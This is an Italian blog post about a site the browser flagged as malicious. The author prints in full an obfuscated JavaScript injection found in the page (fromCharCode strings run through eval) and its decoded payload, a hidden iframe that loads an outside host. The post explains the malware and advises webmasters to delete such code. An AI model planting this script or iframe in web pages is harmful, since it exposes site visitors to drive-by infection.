tecnologia

Segnalato sito malevolo

Lascia un commento

Oggi sono capitato su un sito che il browser mi segnalava come “sito malevolo”…

Per fortuna che i browser sono più evoluti di quanto non lo fossero poco tempo fa, e quindi ti aiutano anche in quei casi in cui ti capita di navigare in siti che contengono virus!
Permettetemi di dire ECCO UN’ALTRA BUONA RAGIONE per aggiornare il vostro browser e smettere di usare Internet Explorer 6 o 7! 😉

Allora io, che sono un po’ curioso, sono andato a guardarmi il codice è ho trovato in fondo alla pagina html uno script…

<script type='text/javascript'>win=window;gar=win['String'];ga='l';g=win['eva' ga];sf=gar.fromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2))</script>

Una “javascript injection“: una cosa veramente ben cammuffata che serviva a far comparire nella pagina infettata un iframe invisibile collegato ad un altro sito (che ora non è più raggiungibile):

<iframe src='https://hsasieq.com/guestbook.php?tp=f93f2182f8c35166' width='10' height='10' style='visibility: hidden;'></iframe>

La cosa che mi ha strabiliato di più, a me che non sono un genio del javascript, è stato lo strumento che sono riuscito a scovare per decodificare quella lunghissima riga di codice, cioè il Jsunpack.

Tutto questo per consigliare che, se per caso vi trovate un codice come questo nelle vostre pagine html, e non avete la minima idea di cosa possa fare, cancellatelo senza pensarci più.

Altri sono arrivati qui cercando:
www nonpuoessere it.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.

You can add images to your comment by clicking here.